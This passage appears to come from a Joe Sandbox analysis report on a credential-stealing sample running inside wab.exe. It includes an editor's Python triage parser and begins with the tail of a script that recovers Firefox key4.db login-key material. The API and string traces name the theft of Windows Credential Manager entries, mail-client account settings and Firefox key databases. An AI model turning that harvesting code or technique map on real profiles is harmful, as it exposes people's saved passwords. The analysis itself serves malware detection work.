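        conn.execute("INSERT INTO nssPrivate VALUES (1, NULL, NULL, NULL, NULL, ?, ?)",
                     (b"\x30\x1fconstructed-wrapped-login-key", LOGIN_KEY_CKA_ID))
        conn.execute("INSERT INTO nssPrivate VALUES (2, NULL, NULL, NULL, NULL, ?, ?)",
                     (b"\x30\x0dunrelated-key", bytes(16)))
        conn.commit()
    conn.close()
    return path


if __name__ == "__main__":
    # Replace with a copy of <profile>/key4.db to audit a real profile.
    print(harvest_key4(build_sample_key4()))
```

Work on a copy of key4.db rather than the live file, and treat a non-None result as "this profile's saved logins were recoverable by the sample" when the host also had logins.json in the same profile directory.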

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
• String ID: 0$6
• API String ID: 3540791495-3849865405
• Opcode ID: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
• Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
• Opcode Fuzzy Hash: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
• Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??3@$strlen
• String ID:
• API String ID: 4288758904-3916222277
• Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
• Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
• Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
• Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
• wcslen.MSVCRT ref: 004084C2
• _wcsncoll.MSVCRT ref: 00408506
• memset.MSVCRT ref: 0040859A
• memcpy.MSVCRT ref: 004085BE
• wcschr.MSVCRT ref: 00408612
• LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
  • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
• String ID: J$Microsoft_WinInet
• API String ID: 1371990430-260894208
• Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
• Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
• Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
• Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
Uniqueness

Uniqueness Score: -1.00%

APIs
• UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
• UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
• UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
• memcpy.MSVCRT ref: 004102D6
Strings
• 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
• 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
• 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
• 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: FromStringUuid$memcpy
• String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
• API String ID: 2859077140-2022683286
• Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
• Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
• Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
• Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
• FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
• strlen.MSVCRT ref: 00406A6A
• _mbscpy.MSVCRT ref: 00406A7A
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
• _mbscpy.MSVCRT ref: 00406A94
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2881943006-572158859
• Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                      • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
• FreeLibrary.KERNEL32(00000000), ref: 00404AD9
• MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
• Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
• Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
• Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
• _mbscpy.MSVCRT ref: 004093F7
• _mbscpy.MSVCRT ref: 00409407
• GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
  • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfile_mbscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 888011440-2039793938
• Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
• Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
• Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
• Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
  • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
• ??2@YAPAXI@Z.MSVCRT ref: 004099C0
• ??2@YAPAXI@Z.MSVCRT ref: 004099DC
• memcpy.MSVCRT ref: 00409A04
• memcpy.MSVCRT ref: 00409A21
• ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
• ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
• ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
• String ID: $$d
• API String ID: 2915808112-2066904009
• Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
• Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
• Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
• Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
• strchr.MSVCRT ref: 0040326D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
• API String ID: 1348940319-1729847305
• Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
• Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
• Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
• Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
Uniqueness
Uniqueness Score: -1.00%
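The function blocks in this part of the report are the raw evidence behind the signatures listed at the top: the block just above, for instance, reads account INI keys (LoginName, PopServer, SavePasswordText, UsesIMAP) through GetPrivateProfileStringA, which is the file-based side of "Tries to steal Mail credentials (via file / registry access)". Turning that evidence into something a triage script can use is an added example by the editor, not Joe Sandbox code: a parser for the APIs / Similarity / Uniqueness records as they appear on this page, plus a flagging rule that is the editor's own assumption (three or more mail-profile INI keys next to GetPrivateProfileStringA), not a Joe Sandbox signature. SAMPLE is constructed from two blocks of this report with the extraction indentation removed.

```python
"""Parse Joe Sandbox function blocks (APIs / Similarity / Uniqueness records)
into structured data and flag the ones whose API-plus-string combination
points at a mail-client profile read. Editor's added example, not Joe Sandbox
code; SAMPLE is constructed from two blocks of this report, and flag_block()
is the editor's own rule, not a Joe Sandbox signature."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
• LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
• strlen.MSVCRT ref: 00406A6A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
• String ID: Unknown Error$netmsg.dll
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
• strchr.MSVCRT ref: 0040326D
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
Uniqueness
Uniqueness Score: -1.00%
"""

# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)], ref: XXXXXXXX"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^.\s]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")  # "• Key: value"
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str                      # address of the call site
    caller: Optional[str] = None  # set on "Part of subcall function" lines


@dataclass
class FuncBlock:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)     # Source File, API ID, hashes
    strings: list = field(default_factory=list)  # String ID split on '$'


def parse_blocks(text):
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()            # drops the extraction indentation
        if not line:
            continue
        if line == "APIs":            # every block opens with this header
            cur = FuncBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur.apis.append(ApiCall(m["name"], m["module"], args,
                                    m["ref"].upper(), m["caller"]))
            continue
        m = KV_RE.match(line)
        if m:
            key, value = m["key"].strip(), m["value"].strip()
            cur.meta[key] = value
            if key == "String ID":
                cur.strings = [s for s in value.split("$") if s]
            continue
        m = SCORE_RE.match(line)
        if m:
            cur.meta["Uniqueness Score"] = float(m[1])
    return blocks


# Mail-client account INI keys, taken from the String ID of the block above.
# Threshold of three alongside GetPrivateProfileStringA is an assumption.
MAIL_PROFILE_KEYS = {"LoginName", "PopAccount", "PopServer", "RealName",
                     "ReturnAddress", "SavePasswordText", "UsesIMAP"}


def flag_block(block):
    """Editor's heuristic, not a Joe Sandbox signature."""
    names = {a.name for a in block.apis}
    hits = MAIL_PROFILE_KEYS & set(block.strings)
    if "GetPrivateProfileStringA" in names and len(hits) >= 3:
        return ("mail-profile-read", sorted(hits))
    return None


def summarize(text):
    """One record per block: API ID, call chain (module!name@site) and flag."""
    return [{"api_id": b.meta.get("API ID"),
             "calls": [f"{a.module}!{a.name}@{a.ref}" for a in b.apis],
             "flag": flag_block(b)} for b in parse_blocks(text)]
```

Feeding the whole saved report text (instead of SAMPLE) to summarize() gives one record per analysed function; the "Part of subcall function" lines are kept as calls with a `caller` set, so a block's direct calls can be told apart from what its callees do, and the Opcode / Instruction fuzzy hashes land in `meta` where they can be compared across samples of the same family.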

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
• Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
• Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
• Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
• Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                                                        • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                                                        • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2432066023-0
                                                                                                                                                                                                                      • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                      • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
• memset.MSVCRT ref: 0040F396
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
• _strnicmp.MSVCRT ref: 0040F3C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide$Version_strnicmpmemset
• String ID: WindowsLive:name=*$windowslive:name=
• API String ID: 945165440-3589380929
• Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
• Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
• Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
• Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
  • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
  • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
• strchr.MSVCRT ref: 00403711
• _mbscpy.MSVCRT ref: 0040373A
• _mbscpy.MSVCRT ref: 0040374A
• strlen.MSVCRT ref: 0040376A
• sprintf.MSVCRT ref: 0040378E
• _mbscpy.MSVCRT ref: 004037A4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
• String ID: %s@gmail.com
• API String ID: 500647785-4097000612
• Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
• Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
• Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
• Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00409239
• GetDlgCtrlID.USER32(?), ref: 00409244
• GetWindowTextA.USER32(?,?,00001000), ref: 00409257
• memset.MSVCRT ref: 0040927D
• GetClassNameA.USER32(?,?,000000FF), ref: 00409290
• _strcmpi.MSVCRT ref: 004092A2
  • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
• String ID: sysdatetimepick32
• API String ID: 3411445237-4169760276
• Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
• Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
• Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
• Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A1A
• GetDlgItem.USER32(?,000003E9), ref: 00405A2D
• GetDlgItem.USER32(?,000003E9), ref: 00405A42
• GetDlgItem.USER32(?,000003E9), ref: 00405A5A
• EndDialog.USER32(?,00000002), ref: 00405A76
• EndDialog.USER32(?,00000001), ref: 00405A89
  • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
  • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
  • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
• SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Item$DialogMessageSend
• String ID:
• API String ID: 2485852401-0
• Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
• Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
• Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
• Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
• SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
• LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
• LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
• GetSysColor.USER32(0000000F), ref: 0040B1CE
• DeleteObject.GDI32(?), ref: 0040B202
• DeleteObject.GDI32(00000000), ref: 0040B205
• SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$DeleteImageLoadObject$Color
• String ID:
• API String ID: 3642520215-0
• Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
• Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
• Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
• Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
• Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
• Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
• Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: strlen$_mbscat_mbscpymemset
• String ID: C@$key3.db$key4.db
• API String ID: 581844971-2841947474
• Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
• Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
• Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
• Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 0040B88E
• GetWindowRect.USER32(?,?), ref: 0040B8A4
• GetWindowRect.USER32(?,?), ref: 0040B8B7
• BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
